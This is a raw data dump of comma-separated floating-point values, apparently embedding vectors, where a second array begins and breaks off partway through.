-0.017397529,0.025166746,-0.0073837913,-0.015414984,-0.0011121867,0.013551373,0.011345979,0.0132740615,-0.0041248617,-0.0025783496,0.0137223415,-0.00996429,0.0057092262,-0.0082659125,-0.008640937,0.008965303,-0.011087022,-0.022949005,-0.013667127,0.0076939394,-0.01414179,-0.013781522,0.0230958,-0.03238036,0.008625663,0.018599791,0.0015111229,0.007021016,-0.0034021784,-0.017194333,0.032165617,0.0055698673,0.00249334,-0.003084199,0.015169003,-0.027804837,0.030096816,0.00877652,-0.018968267,0.0048375973,0.0028466925,0.029268628,0.00027533996,-0.005741787,0.0012471727,0.012650064,0.027004253,-0.008188869,-0.007198206,0.012158698,-0.008938565,0.004607201,0.01204544,0.023295252,-0.0139970565,0.0022545902,0.013741417,-0.015739592,-0.026792785,-0.0016618465,-0.004195839,-0.011598153,0.0066513224,-0.03283042,-0.014250006,-0.005221739,-0.0129965525,0.005919308,-0.0056346385,0.02903462,-0.00086710526,0.02454988,0.013482936,0.00394939,0.015121456,0.0055798576,-0.013564094,-0.0052574063,-0.0011672232,0.0017594281,-0.032058954,0.0039711623,0.0148905935,0.018770706,0.02562491,0.0071708877,0.00082978094,-0.030957464,0.021539528,0.024945403,0.006941925,-0.0138225835,0.024008151,-0.0053802505,-0.018717075,-0.012064179,0.009767877,0.019811455,0.0023535658,0.010299972,-0.0093750805,-0.022054717,-0.0052854368,-0.0178121,0.052382115,0.021569679,-0.0041919714,-0.025747191,0.018290197,-0.024521312,0.015260727,-0.005679987,0.018470233,-0.014445724,-0.030516332,-0.032161456,-0.0075982735,-0.02197244,0.007230141,-0.008527787,0.007243189,-0.0040003364,-0.005458626,0.019824175,-0.007418792,-0.016883096,-0.0012087943,0.00048469318,0.012875505,0.015394897,0.005765151,-0.025094202,0.011967685,-0.0063890074,-0.0037106092,-0.014443831,0.006234566,0.015250996,0.0057064993,-0.000061427505,0.004702922,-0.0051809764,-0.015378343,-0.0055775354,0.0006938044,-0.032823928,0.03835348,0.0035698006,-0.00016506348,-0.0123716425,-0.009953339,-0.0054571405,0.010050235,-0.020454528,0.013207639,-0.013084488,-0.016089275,0.0042029307,-0.008323244,0.008179802,0.0078074085,0.010751954,0.020364422,-0.016065866,0.015003442,-0.010838491,-0.0063206423,0.0066638696,-0.006262127,-0.0070528197,0.0013246532,-0.027178565,0.00858215,-0.0077117803,0.009361949,-0.0022158618,-0.016931511,0.01200831,0.014016683,0.012590166,-0.0005869715,-0.025933944,0.0070719547,-0.003414956,-0.0023109324,0.0011333887,0.029805116,0.008771463,-0.016897019,0.012072257,0.009177968,-0.0060100514,0.07854746,0.013236823,0.000989445,-0.012965444,0.0121014295,0.02162543,0.028795762,0.009487776,-0.012964128,0.008109499,-0.021998426,0.004860766,-0.015452936,-0.00009675237,0.023691803,0.006596533,0.028996468,-0.005132514,-0.015946878,-0.001277197,-0.005369867,0.005776245,0.009993045,0.013683641,0.0027775902,0.028290136,0.018765815,0.023027383,0.008841065,-0.008807955,-0.016176213,0.015522961,0.008810547,0.016536422,-0.03322815,-0.05115511,-0.00086771837,0.12721725,0.00046797408,-0.010327486,0.045564324,0.00046235183,-0.00012465907,-0.085070916,0.010769989,-0.009067845,-0.018259153,-0.002809674,0.0020218596,-0.020465055,0.015652722,0.009607996,0.0109782815,-0.001150071,0.0054132836,0.01170701,-0.009965527,-0.018414447,0.016369805,-0.024997067,-0.015354565,-0.04317827,-0.010741706,-0.007499704,0.0044703423,-0.007907413,-0.027944673,-0.007937136,-0.024524076,0.011184344,0.0048230747,-0.012536297,0.015261044,0.0022600035,0.02368235,0.0049906587,0.03174517,0.014545667,0.0062706475,0.007520416,-0.040610913,-0.13879964,0.0048355768,-0.008699619,-0.043621466,0.03679005,-0.016747156,-0.014651044,0.00078551704,0.01985715,-0.01600893,0.0055846814,0.004959035,-0.01019987,0.024939438,-0.009474051,0.0031611756,0.00816913,-0.0041625863,-0.01073993,0.0022329227,0.009388473,-0.002913789,-0.00825005,-0.045448147,-0.031064207,0.0058652465,-0.0046745706,0.0384114,-0.017902423,0.012763235,-0.018749775,0.024634125,-0.025757894,-0.014143638,0.000042081472,-0.03368389,-0.0030385966,-0.006914127,-0.0012790916,0.019934451,-0.0071024178,0.008004794,0.01597582,-0.020520646,-0.005655671,0.00007200898,0.009277137,0.025274996,0.0257223,0.0031742344,0.026381502,0.017042104,-0.015555128,-0.0026970226,-0.0065969303,0.019502943,-0.0041159517,-0.005082477,-0.01929879,-0.003243718,-0.015752489,-0.02953954,0.004557824,0.0045949365,0.022773704,-0.0048082056,0.033263836,-0.022357898,0.00011138237,0.004585444,0.0039431117,0.00036646903,-0.0025582933,-0.005640549,0.0026473724,0.01152926,-0.023531605,-0.0043050456,0.023990586,-0.006810173,-0.011287518,-0.014824648,-0.008987765,-0.0052032666,0.007340957,0.0010253083,0.015938796,0.0152255725,-0.014234088,-0.024616206,0.04583504,-0.018229939,0.010139252,0.0012404595,0.021438347,-0.003963718,0.034760058,-0.010133983,-0.025534142,0.012327668,0.009590505,-0.011382317,-0.010618978,0.01062495,0.0056628617,-0.005227555,0.0077872407,-0.016318845,-0.016696263,-0.018183928,-0.018300282,0.003838318,0.020332849,0.017527321,-0.010772346,-0.015667092,0.008340154,-0.00051798543,-0.00404372,-0.009877124,-0.024818607,0.014233979,0.008805565,0.021193126,0.04668339,0.013992946,0.0003792739,-0.008767555,0.006861751,0.007712401,-0.023053987,0.021192502,-0.014716391,0.010587818,-0.0074762586,-0.008503906,-0.008716553,0.012154704,-0.039937682,-0.004719535,0.005341383,0.0048086126,0.008809073,-0.0037157934,0.014961356,-0.021175902,0.046505496,-0.004615219,0.02075074,-0.0013610631,0.008135295,0.008306678,-0.012088096,-0.028930152,0.0068912515,0.07920903,0.00075745676,-0.023710316,0.011598059,0.012775482,-0.003883102,0.020028949,-0.012180659,0.013580402,-0.0058421427,-0.019531604,-0.011133992,-0.0119317295,-0.00906977,-0.026261264,0.029532151,0.0052130264,0.016586846,-0.0017145259,0.0042339987,0.01609973,-0.012843802,-0.012472029,0.016915968,-0.0077657523,0.015533498,-0.00023032795,0.011199273,-0.0044967136,0.0057011214,0.00032632996,-0.012262623,-0.0027894229,0.003904537,0.03640492,-0.027782366,0.009672674,0.010251697,-0.009859576,-0.0005784582,0.006772442,0.03111869,0.00045753742,-0.015828278,-0.021725839,-0.015712913,-0.026205158,-0.006579893,0.0014768635,-0.0038973296,0.0111745065,0.009120979,-0.0045551574,-0.009510416,-0.0014898422,-0.008803015,0.008591063,-0.0067184693,0.012352464,0.0008142875,0.018233957,-0.023210686,-0.022906175,-0.007467813,-0.015317692,-0.00086232735,0.0060772346,0.00034179335,-0.0034687286,0.014953468,-0.0112710195,0.015769618,-0.002171315,0.0018022856,-0.006079546,0.008054729,0.0041247834,-0.012168266,-0.011781466,0.020369869,0.0064260885,0.013850499,-0.006803676,0.011307887,-0.007086228,-0.056441933,-0.00887983,0.0279951,-0.029820573,-0.0049516945,0.0000113361175,-0.0044156075,0.020633783,0.002604814,0.014584754,0.009044175,0.004890328,0.00630598,0.035668988,-0.002321853,0.030605875,-0.008764327,0.00015690138,-0.04402222,0.010595086,-0.019955795,-0.002856563,-0.021826146,0.01939083,-0.010539616,-0.0033637953,-0.014138754,0.015995793,-0.0318931,-0.023651008,0.023211725,-0.00077453506,-0.0007503332,0.004686803,-0.0071188337,0.009525837,-0.011660743,-0.005647361,0.015036521,0.03360202,-0.01942633,0.007907052,0.02096049,-0.023520097,0.017403526,0.0080663245,0.019048063,-0.0011703646,0.0033667665,-0.022987692,0.009325175,0.0022744255,0.012389752,0.008675791,0.029269783,-0.012463537,-0.01806686,0.011434691,0.002130106,-0.0054563847,0.016709456,0.0042277863,-0.0028847575,-0.0068645664,0.003105229,-0.009571204,0.002899665,-0.0038006834,-0.005897393,-0.005310508,0.018387247,-0.022001566,0.0031574368,-0.019799577,-0.00021573082,0.010395374,0.019255904,0.00837619,0.004324232,-0.016136086,0.01605306,0.019582324,-0.014603125,0.029217634,0.0011635361,0.010734072,-0.025821874,0.01121608,0.00018456393,0.022075739,-0.004598015,0.018144587,0.026690379,0.0021559068,-0.01170969,0.015122142,0.0110301925,-0.01625029,-0.026233329,-0.019782878,0.007280153,-0.010235942,0.025545504,-0.010210749,-0.009653566,-0.010266714,-0.016453128,0.0060533057,-0.018161401,-0.005162783,0.0030388415,0.0037804649,-0.02481081,0.006688633,0.01080122,-0.005745671,0.03330978,-0.024363682,-0.023318555,-0.010488458,-0.0017673841,0.0056887907,0.0019749806,-0.002117153,-0.011352012,-0.010838345,0.008846198,-0.0050178757,0.0014360377,-0.008669093,-0.037209805,-0.007861216,0.013362918,-0.0038555188,-0.03870839,0.013170437,-0.0038920622,-0.017741531,-0.011964548,-0.0045430586,-0.030402744,-0.01701524,0.064037,-0.0041344506,-0.0134872645,0.017462978,0.01548937,0.019659335,-0.0028180054,0.023414673,-0.021488462,-0.014256643,-0.019904813,-0.03959987,0.006503195,0.004241614,-0.021865103,-0.019976512,-0.0069428654,-0.006270665,-0.017551206,-0.003329794,0.0147038875,0.0018001663,0.005994965,-0.0043113097,-0.015214801,-0.041574806,-0.0021478795,0.011589748,-0.0043816706,0.0010064109,0.01362402,-0.008283952,-0.011866719,0.00548216,-0.014720538,0.0077218506,0.0018610458,0.015955871,0.015880767,0.0060929786,0.013506393,0.0040910207,0.011843932,-0.00016569505,0.014737343,-0.011580168,0.003750185,0.011217059,-0.0071104546,-0.008146952,0.0009792175,0.010178049,0.022354081,0.017496193,-0.022758624,0.027922885,0.001094746,-0.005464073,-0.0127593875,0.0009597478,0.03153161,0.013517331,-0.028787356,-0.0105212275,0.0014627206,0.01120135,-0.008807286,-0.0012348021,-0.0038697084,0.010839925,-0.017294012,0.0137682,0.00867552,0.011911809,-0.007816636,-0.016988443,0.019671502,0.0071956185,0.0064229867,0.011336858,-0.013091624,0.0007955253,-0.01275404,-0.01593991,0.0054589617,-0.0022476295,0.035012893,0.020395918,0.010641684,0.0037813091,0.024321375,-0.01554346,0.0120285535,0.01104539,-0.020798236,0.016852437,0.0052598487,-0.013901698,0.0018598723,-0.01971862,-0.011737578,0.010318433,-0.01668367,-0.007170253,-0.024706447,0.009928253,-0.050349914,-0.00041007073,-0.019365828,-0.010312083,0.0000010304132,-0.01918447,-0.006559507,0.03790165,0.010497538,-0.04901196,-0.0075507383,0.0104325535,0.00017089964,-0.011612858,0.0010843489,-0.0011218834,-0.009583947,0.0034847923,-0.014224532,0.0032789141,0.0151069295,-0.012152552,-0.0055014463,-0.002732865,0.0051036784,-0.003381891,-0.003182723,0.014610156,-0.00664183,0.009532019,-0.013714756,0.014260941,0.0030602892,0.021554753,-0.0066334014,0.0047419695,0.0027074176,-0.008302332,0.010329912,0.031439967,-0.006583247,0.0016856259,0.0012770384,0.004256189,0.039886918,0.0053375,0.017058821,0.011820421,0.015300455,0.02627705,-0.03815293,-0.016267996,0.013735223,-0.012166837,0.006018485,-0.017881319,0.013461722,-0.012638321,-0.0002684051,0.0027522985,-0.0291627,-0.0060103843,0.0047518844,-0.016097065,0.008751701,0.0047139125,-0.0044325744,-0.025279557,-0.025269037,0.008759856,-0.0011441302,0.016963713,0.003247171,-0.009261611,-0.001873037,0.010067526,0.0057659354,-0.013558745,-0.016655274,0.0072913035,-0.03628133,0.0042558433,0.006416036,-0.0027142204,-0.0021493123,-0.009598875,0.021134079,0.0099479705,-0.00017324403,-0.0067697847,0.026682295,0.002424534,-0.0022727654,0.013982963,-0.03528261,0.011550302,-0.003362926,0.020135226,-0.0087140305,-0.010426634,0.0039926595,-0.011581813,-0.009160234,-0.018819472,-0.110691085,-0.013190682,0.0020537786,0.006091571,-0.004734602,-0.0057190876,0.021238308,0.00947305,0.032318756,0.018066788,-0.03341601,0.003286903,-0.02400908,0.0048577357,-0.023054091,-0.0032152429,-0.024359474,-0.0046160407,0.0064647226,-0.01035208,0.0033202912,-0.0055264165,-0.01927404,0.003952078,-0.005340997,0.007853468,-0.0034807606,0.03308994,0.037515547,-0.0083557125,0.005070076,0.001468741,-0.026732264,0.004524048,-0.052193534,0.01231224,-0.012468839,-0.010628575,0.00045026367,0.0053919614,0.013277255,0.019754112,0.008051999,0.0036589445,-0.0113440575,-0.009750893,-0.012666242,0.014204977,-0.009130897,0.013124336,-0.0055117067,0.0072534247,-0.008572447,0.0034800544,-0.022606453,-0.014079518,0.00027974742,0.017837765,-0.0079287635,0.013924374,-0.010094753,-0.017569952,-0.019741712,0.0167187,-0.011746834,0.030071033,0.01687132,-0.008003013,0.014746561,0.031716246,0.016799288,0.011086482,0.007167598,0.0017133376,0.03452795,0.006028125,0.019839535,0.024003502,-0.0007070619,0.005210306,-0.0040572146,-0.02084436,-0.0016462083,0.020117776,-0.041371003,0.0114560425,0.006326568,0.028033441,-0.0053927074,-0.0010618574,0.0076721255,0.02539798,-0.019035973,0.022179782,0.029602017,0.021536391,0.034942526,-0.02401188,0.005883357,-0.003159746,-0.0076294844,0.0076122982,0.00031415958,0.008418425,-0.023621775,0.025986398,0.023258656,-0.03478468,-0.0008198766,-0.0021362968,0.03387184,0.036983527,-0.031702872,0.0020718183,0.0085313525,0.018430153,0.008464061,0.0008785915,0.012365259,-0.022489008,0.0009895058,0.024296913,0.0031260834,-0.025612632,0.002486072,-0.022887573,-0.015648268,0.016377103,-0.010330061,-0.0151234865,-0.00025177278,-0.013954381,0.028970508,-0.0041125785,0.0037877162,-0.00048457948,-0.025254363,0.025399847,0.014835008,-0.0007264726,-0.008723603,0.008428904,0.008388461,-0.018254524,0.0009353639,-0.006594307,0.003559877,-0.023230383,-0.0006418771,0.021070743,0.006561211,-0.001752369,0.017701473,0.018637223,0.0020887654,0.0037014014,-0.008369079,0.01008873,-0.0145038115,0.016493522,0.0042811343,0.0097245565,0.015602006,0.007133225,0.0051718284,0.010113077,-0.00944324,0.017753046,-0.012520101,0.009730566,0.003352894,-0.013787932,0.006243634,-0.057559963,-0.0074673197,0.014765359,0.0076147304,-0.0039817155,0.019712431,0.027488573,-0.02693817,0.00829078,-0.02276329,-0.00012962919,0.009125787,0.015915297,-0.008451102,-0.006669335,-0.00008728795,0.020148046,0.04431633,0.017731998,-0.00050265476,-0.010468379,0.014556305,-0.0007431175,0.0036393227,-0.004058207,0.024515245,0.007173629,-0.026121078,0.015102876,0.007684607,-0.037689026,0.024515647,-0.003569762,0.002029659,0.043500613,0.0006221736,-0.011729504,-0.0059935083,0.020409295,-0.029510893,-0.0072295945,0.011952903,0.02420808,-0.01074511,-0.015589587,0.020274937,-0.013121771,-0.01942591,0.010481664,0.019424433,0.007834241,-0.0071880175,0.022536179,0.009017566,0.013218392,-0.007593289,-0.018082801,0.017762981,0.021034567,-0.029151319,-0.00035481824,-0.010594928,-0.010434458,0.0134682525,-0.010003579,0.01442718,0.018432103,0.023596952,0.011582991,0.025982285,0.015511217,0.024307461,-0.0034229874,-0.014243084,-0.011672784,0.025387794,0.039040472,-0.0036069443,-0.020011868,-0.008464619,0.012614444,0.008947372,0.006859309,-0.020154215,-0.0055763186,-0.03296769,0.012920446,-0.022122001,-0.0086878585,-0.030266708,0.008610533,0.0048356145,0.013275692,0.0016289902,-0.046282787,-0.006072101,-0.011723822,0.009635862,-0.0004827368,0.018151343,-0.004482475,-0.024733651,-0.008847171,0.0246142,-0.0051097623,0.012673758,0.018176405,-0.001997594,-0.00632673,-0.008763915,0.013981439,-0.011312319,0.012451936,-0.0070982263,0.0021148892,0.005018239,-0.006202493,-0.013791446,-0.006326269,0.00079240825,-0.026619423,0.0065013864,0.012698772,0.019098299,-0.0033336715,-0.0051621846,-0.0021773772,0.013302889,-0.011718197,-0.008712207,-0.006553644,0.015975915,-0.022087093,-0.013230567,0.025751567,-0.023532715,-0.010895059,0.0058229933,0.019073537,-0.012637613,0.032797188,-0.0033002046,0.0073314416,-0.012142625,0.00241965,-0.017214146,-0.000003252604,-0.00626449,-0.008918073,0.01024292,-0.018065779,0.006073323,-0.0061216136,0.01953263,0.035420578,-0.0055281357,-0.04103487,0.019513821,0.0042631594,-0.013897439,0.0045228237,0.0066901688,-0.016398918,0.023734897,0.03712916,-0.014582681,0.0072437148,-0.003694259,0.0059612,0.0074938824,-0.0121346405,0.0075969384,0.01946542,0.014696972,0.014433869,0.012235734,0.0042950376,0.0061014467,0.023260916,-0.0007707329,-0.008511328,-0.0053650057,0.024876721,-0.038047645,-0.015489893,0.0150630735,0.015384784,-0.016323399,0.023720006,-0.014355411,-0.023908826,0.0065655997,-0.026042193,-0.02723727,0.015091228,-0.024754314,-0.0067676916,-0.011463432,0.013870819,-0.009597901,-0.0173263,-0.0285914,-0.0923982,0.022061236,0.02049927,0.009728128,0.038467854,0.0033120932,0.0035659152,0.0068193353,-0.021945758,0.010468531,-0.013862747,-0.010563656,-0.0024170736,0.012141395,0.027155012,-0.02387774,-0.008816248,-0.0051912274,0.0018204345,-0.041692242,0.0068834024,-0.01604238,-0.016108276,-0.0024248557,0.011368815,0.008558556,-0.010287534,-0.020917518,0.0033432473,0.0072242366,0.007819557,-0.004353906,-0.013496442,-0.0023618734,-0.020676235,0.017287852,-0.019752303,0.000603827,0.015677717,-0.02512988,0.0008285822,0.0009549827,-0.0026142746,0.006390699,-0.022305408,0.02763242,-0.008543341,0.0036217703,-0.023917789,-0.0057085482,0.0072094207,-0.0034612587,-0.0020780116,0.037196513,-0.000033075372,-0.00046442373,0.022684567,0.01794556,0.015102627,0.0006016828,-0.007457043,0.016786199,0.0085694855,-0.016510693,-0.004717364,-0.0040488197,0.0013582249,0.01530037,0.0014982407,0.007111751,0.018276,-0.028593522,0.004562216,-0.013167553,-0.008729492,0.00083431596,0.015912741,-0.020652356,-0.022455394,0.012835511,0.03828912,-0.022666719,0.017655961,0.008012469,-0.010765642,0.013151885,0.013523593,-0.000023219907,0.006797186,-0.011880774,-0.0054730843,-0.011234379,0.008192778,-0.0000340374,0.016238773,0.0092825815,-0.007146302,0.009994406,-0.00926747,0.007887348,-0.006396534,0.019623742,0.0016298512,-0.013034355,-0.017200215,-0.024706496,-0.025655752,-0.02302527,-0.012579333,-0.007953739,-0.019084997,0.024237653,0.04125331,0.029217137,0.012965963,0.023831133,-0.0025269585,0.015458933,-0.012082298,-0.009531663,-0.016657667,0.00038254538,-0.02019915,0.038692,0.029786216,0.004858639,0.010000437,0.009551891,-0.0102554215,0.005449049,-0.006586626,0.029123716,-0.003249869,0.018470123,-0.02178225,0.0033557913,-0.003047356,0.019944731,0.008913828,-0.014011697,0.0069422964,-0.025783416,0.02563906,-0.018852243,-0.0081829075,0.016993586,-0.002145406,-0.008712997,0.017178223,-0.007875104,-0.021730378,0.0006314941,-0.024189157,0.004347007,-0.018657295,0.010851071,0.009670026,0.021868557,-0.009886847,-0.020453556,0.0060672103,0.026511457,0.025844775,-0.016631622,-0.015479405,-0.009439334,0.012994828,0.009244394,-0.009854234,0.005807159,-0.032018993,-0.014665327,0.0188231,-0.01239739,-0.018015794,0.0018072426,0.028951425,0.042039387,-0.019424569,0.010494579,-0.024028672,0.016140398,0.0012398366,0.004271534,-0.002156916,-0.014526294,0.009773603,0.0057246694,0.030671626,0.0018626051,0.023587089,-0.028535916,-0.017207276,-0.014517098,0.00058183697,-0.0070614745,-0.008474454,-0.0029746837,-0.017279707,0.021309072,-0.0047597196,0.03285859,-0.0030044594,0.005475155,0.033192992,-0.006536085,-0.014888922,0.0051066685,-0.011864302,0.0012400291,-0.012914075,0.0033485815,0.023697848,0.10002354,-0.0094895335,-0.01479894,-0.00082289986,0.010616186,0.026315523,-0.0032248243,-0.016711162,-0.012376786,0.0036559952,0.024674643,-0.019133316,0.013918684,0.0017389964,-0.008772613,0.018708002,0.01781356,-0.027447969,0.024517756,0.020037998,0.021893438,-0.018725455,-0.01815866,-0.04879099,0.010316684,-0.07183195,0.021092122,0.009573967,0.004621883,0.030254012,0.0039088717,-0.0052202395,0.019289674,0.025228383,0.00061228796,-0.00012568476,-0.012279195,-0.010044737,0.002991927,-0.017627727,0.020085247,0.0076835454,0.011580073,-0.012536014,-0.011810072,-0.014938659,-0.009938229,-0.02511792,0.008608297,-0.0019671924,-0.001504247,0.005227323,0.015329089,-0.012736766,0.035529986,-0.006052736,0.009789052,-0.0047093923,0.025047971,-0.015440469,-0.009809937,0.007318859,-0.004692441,0.016277997,0.01309267,-0.009380098,0.0033955353,-0.010938514,-0.02089874,-0.021719659,0.022004696,0.0047747134,-0.008586404,0.0045349333,0.0033585362,0.033656407,-0.010827312,-0.0041161184,0.0003819581,-0.019838754,0.02256864,0.00002239334,0.017079536,0.023438735,0.004598836,-0.0147699,-0.037282895,0.030354152,0.0037467293,-0.013824389,-0.010758747,0.014166118,0.012904093,0.02343939,-0.007656022,0.0047192033,0.0023936364,-0.020537257,-0.021978067,0.0024825167,-0.018533938,-0.021786025,-0.0013532358,0.0037380357,0.012389424,-0.03161929,0.016800422,0.026127072,-0.007591031,0.0015475187,-0.005812433,-0.00068092736,-0.0070519573,0.015737204,0.009040376,0.030039951,-0.022996891,-0.013076935,0.0069119176,-0.01549067,-0.0044345167,0.013213014,0.0118414285,0.04732442,0.0034753112,0.02136404,-0.011883838,-0.004301043,-0.010957757,0.01001925,-0.001901564,-0.026105851,-0.012237362,0.024627049,0.0037983512,0.012487004,0.03201331,-0.014598407,0.00070969213,0.007918861,0.028341725,-0.008801815,0.0061476543,0.016148139,0.012242553,-0.027403882,0.01749936,0.011931819,-0.0065039117,0.016816221,0.0139749255,0.016554844,-0.007891846,-0.0149618285,-0.012334007,-0.016200056,0.0002298365,0.003749791,-0.000052027786,-0.0120329885,0.012594584,0.0037399554,0.026571868,-0.036165804,0.0056759147,0.021686574,0.017711353,0.01728577,0.014808697,0.020461472,-0.01264524,0.0017625614,0.0074015395,0.010889968,-0.013599323,0.005750537,0.017130475,0.012821957,0.010408773,0.015693959,0.009362679,0.007354241,-0.0110912295,-0.008254402,0.03583827,-0.0028835132,0.0048135137,0.0019681533,-0.0302653,0.014443161,0.007159946,-0.006321321,-0.005333936,0.00496611,-0.003452228,-0.0005071179,-0.005024844,0.022232536,-0.019979693,-0.038496297,-0.022363253,0.00021504259,0.02324005,-0.013136909,0.013167006,-0.006090432,-0.00013884508,0.003422996,0.007348704,-0.012355804,0.0135295335,0.0051286966,0.0033382971,-0.035427615,-0.010168937,0.0045432323,-0.008199672,-0.02597368,-0.015609598,-0.013188372,0.019043978,0.0009022505,-0.008401742,0.014936253,-0.007996108,0.0037615385,-0.026399542,0.00097096857,0.0042142863,-0.037460577,-0.0051685194,-0.000506531,-0.0061445194,-0.00923884,-0.010548367,-0.02800328,0.0151709365,0.009959789,-0.004566144,0.008526879,-0.013518068,-0.0022532337,0.011515812,-0.01059593,-0.0012283917,-0.004137347,-0.0030592557,-0.014881526,0.006664284,-0.004594305,-0.03664391,0.002178592,-0.019252935,-0.020174338,-0.032633476,-0.010056416,0.015767904,0.039875437,0.022053892,-0.003950276,0.005238959,0.015863007,-0.0020472154,0.023147758,-0.0017804125,0.020799363,0.008546427,-0.010536538,-0.030804299,-0.0015602352,-0.023048751,0.023912527,-0.008317398,0.005252084,-0.0048876987,0.010098199,0.0032978298,-0.00047976672,-0.0064250985,0.0025775777,-0.00040941377,-0.030912906,0.008660922,-0.00059282815,0.00029838205,-0.029280247,0.020823909,-0.003441724,0.041149847,-0.04411147,0.010097426,0.0051808376,-0.0119648855,-0.022482054,0.013680121,0.009512514,-0.029005142,-0.026027849,0.008406137,-0.0127040325,-0.00865129,-0.025781762,-0.012789559,-0.0049465057,-0.021375664,0.025433354,0.010355037,-0.0059664403,-0.0049726884,0.011911473,-0.009901419,-0.0012809789,-0.008164105,0.0013924742,-0.028089449,-0.015426021,-0.008751237,-0.0047665318,-0.005390776,0.00959159,0.028254358,-0.029207332,-0.0062917597,0.008955506,-0.0005362276,0.009740884,0.0050253966,-0.030823711,-0.01594655,-0.026223205,-0.010286568,-0.005126128,-0.005292125,-0.03881856,-0.01305341,0.013607015,0.0049809595,0.11571646,-0.021816373,0.0019390348,-0.005392975,0.008473948,-0.022551259,0.01909702,0.025784837,-0.0044257115,0.018172264,0.009994195,-0.0016958667,0.0021002237,0.007434299,0.0011241825,0.011750285,-0.002511153,0.13744488,0.00019337334,0.017151661,0.015497109,-0.00059711543,-0.000118292715,0.0035637538,-0.00018887394,-0.07971231,-0.0020417422,-0.020065645,0.00055780035,-0.020542627,-0.022068325,0.023015443,0.00013644826,-0.003012081,-0.010244682,0.003484257,0.024893867,-0.018255772,-0.02189802,0.008023557,0.017496543,-0.015407948,-0.018609755,-0.0076356223,-0.000087230954,-0.0006979247,-0.030929038,-0.012649203,-0.010510281,0.037888058,-0.0074871164,-0.016585287,0.0028265715,0.016653271,0.025293667,0.009919609,0.015294036,-0.010704425,-0.03822995,0.016664304,-0.014794861,-0.0019819136,-0.0071955584,0.04175446,0.0053884736,-0.007529792,-0.023331676,0.00660344,0.010749439,0.021821404,-0.0015370027,-0.0011760832,-0.011749872,-0.008807397,0.035159763,0.010172692,-0.0145254135,0.0036961278,0.02259582,0.018427832,0.010000739,0.017378181,-0.03363884,-0.007270843,0.020789923,0.0068116,0.0022280999,0.0008825377,0.014297914,-0.004711622,-0.020840177,-0.0070494926,-0.010791029,0.019593833,0.0116510205,0.019974098,-0.0045345877,-0.01076604,-0.007170261,-0.0055795196,0.00051484565,0.026277594,-0.005103865,-0.0008863061,0.002842853,0.012160758,-0.015784355,-0.03510463,0.0020779837,0.011441226,0.011518689,0.000059367372,-0.0017207236,0.018540056,0.0060266545,-0.0015216577,0.003654349,-0.011895955,-0.03186772,0.012674631,-0.0022610165,-0.01838854,0.0019644974,0.015600382,-0.012926321,0.015072456,0.018036004,0.008912587,-0.012666898,0.0057505206,-0.0046385066,-0.0031090442,0.0051165135,0.05583897,-0.0024033547,-0.025369551,-0.03174327,-0.045547966,-0.02233099,-0.004312048,0.01457948,0.0062991725,0.0038705969,-0.0057864944,-0.024375895,-0.019571451,-0.0005381918,0.002795973],[-0.0016214976,-0.0029163426,-0.018644104,-0.013589769,0.0127326995,-0.01986926,-0.004611633,0.020722719,0.0014277039,-0.019030321,0.0023406476,0.0030294142,-0.0013595866,0.017895913,0.01078046,0.0015418442,0.010627975,-0.0032673068,0.0019962352,-0.004745024,0.0016013947,0.0028084952,0.009705518,0.010905331,-0.0020045966,0.0080851605,-0.015833946,-0.010045689,0.009062129,0.0057292357,0.001241453,0.022580456,0.0048707034,0.02575151,0.0009110582,-0.022928081,-0.028522298,-0.026042935,0.014705218,-0.013659334,-0.010308358,0.015554004,-0.009645505,0.03754441,0.0002955367,-0.0013253688,-0.0032371276,0.009109592,-0.012225383,0.01888236,0.0038846687,0.03089124,-0.040293172,0.015176189,-0.01683895,-0.010210401,0.015202509,-0.032727905,0.023403203,-0.02307319,-0.014941377,0.007421188,0.018907662,-0.026542809,0.021376317,-0.007782168,-0.011213541,-0.027177822,0.009657719,-0.022741366,0.0076184985,-0.0034593847,0.003812223,0.008670974,0.008384975,0.012804184,0.0045715286,-0.009187988,-0.02062525,-0.00009602423,-0.031780753,0.00534072,-0.020532316,-0.02120417,0.013513796,0.0042202314,-0.004232529,0.028355561,-0.004817669,-0.02098623,-0.014788024,0.0037961612,0.01444837,-0.01907976,0.0034748667,0.025749616,-0.0018388319,-0.021775402,0.004132501,0.024303615,-0.0000162785,-0.021000657,-0.016459126,0.00734876,0.005675506,-0.01694604,-0.0015609959,-0.018181827,-0.008682756,-0.013044293,0.003389471,0.011120685,0.015863393,0.014670299,-0.025679015,0.0037811238,-0.009123281,0.0126629975,0.001969338,-0.005718174,0.01915902,0.016587703,0.012341382,0.0019195874,-0.012259482,0.005696306,-0.02137232,0.019191276,-0.007162616,0.008154111,-0.003185879,0.0028207423,-0.022781162,-0.0046918485,-0.001341383,-0.0026404718,0.00031654633,-0.008246505,-0.0018445071,0.01023495,0.017096769,-0.015469668,-0.0052832616,0.010458849,0.01465511,0.0150365755,-0.01230057,0.0012832498,0.015125368,-0.00019833707,0.01875748,-0.0076805335,0.006201278,0.002085467,0.012390248,0.026332252,0.011919005,-0.025148502,-0.0062444513,0.0031789232,-0.010007825,0.005525903,0.0068232627,0.006113091,-0.020921256,-0.042180154,0.016242012,-0.002732464,-0.020740146,-0.012321639,0.01305691,0.010950997,0.01809679,-0.0074821943,0.008786076,0.015034316,0.0006071298,-0.00322092,0.00034016214,0.0129756965,0.010766383,0.015185174,-0.009422226,-0.00060286967,0.0063016587,0.011583081,0.017041326,0.026138635,-0.012536145,-0.014215045,0.013037533,-0.010223746,0.011129325,0.0056919055,-0.018141955,-0.028623177,0.010251024,0.07946298,-0.0001604307,-0.0019176948,-0.0061875284,0.0048036925,0.004527467,-0.027314877,-0.0104634,0.0018508646,-0.010836929,-0.006597667,0.018556008,0.0056408043,0.022192286,0.004444844,-0.0041489936,0.0014877949,-0.0018663768,-0.054939162,0.013724489,0.002945824,-0.0054079834,-0.00779874,-0.010859772,-0.00007060131,0.0046442244,-0.027980383,-0.0007848433,-0.023076992,-0.01159348,0.00019327409,0.007293154,-0.019069972,0.036914613,0.004555661,-0.014780802,-0.029622503,0.021595042,-0.0035209884,0.012432652,-0.024651192,-0.0026511874,-0.014705195,-0.0025262465,0.0038410996,0.034350332,0.030237064,-0.0011101397,-0.008755323,0.006317779,-0.0036887666,-0.00050219917,0.020462498,-0.0020331838,0.0016920146,0.023590421,0.021881513,-0.0064143157,-0.027760666,0.022194445,-0.004169559,0.0013429876,0.0059199757,0.022670832,0.020449275,-0.004598783,0.023324262,0.01723211,-0.010778715,-0.0058855726,-0.030670675,-0.014526156,-0.0111905625,-0.0046848482,0.003607114,0.0049250307,-0.009638814,-0.0006796446,-0.006313946,0.01262345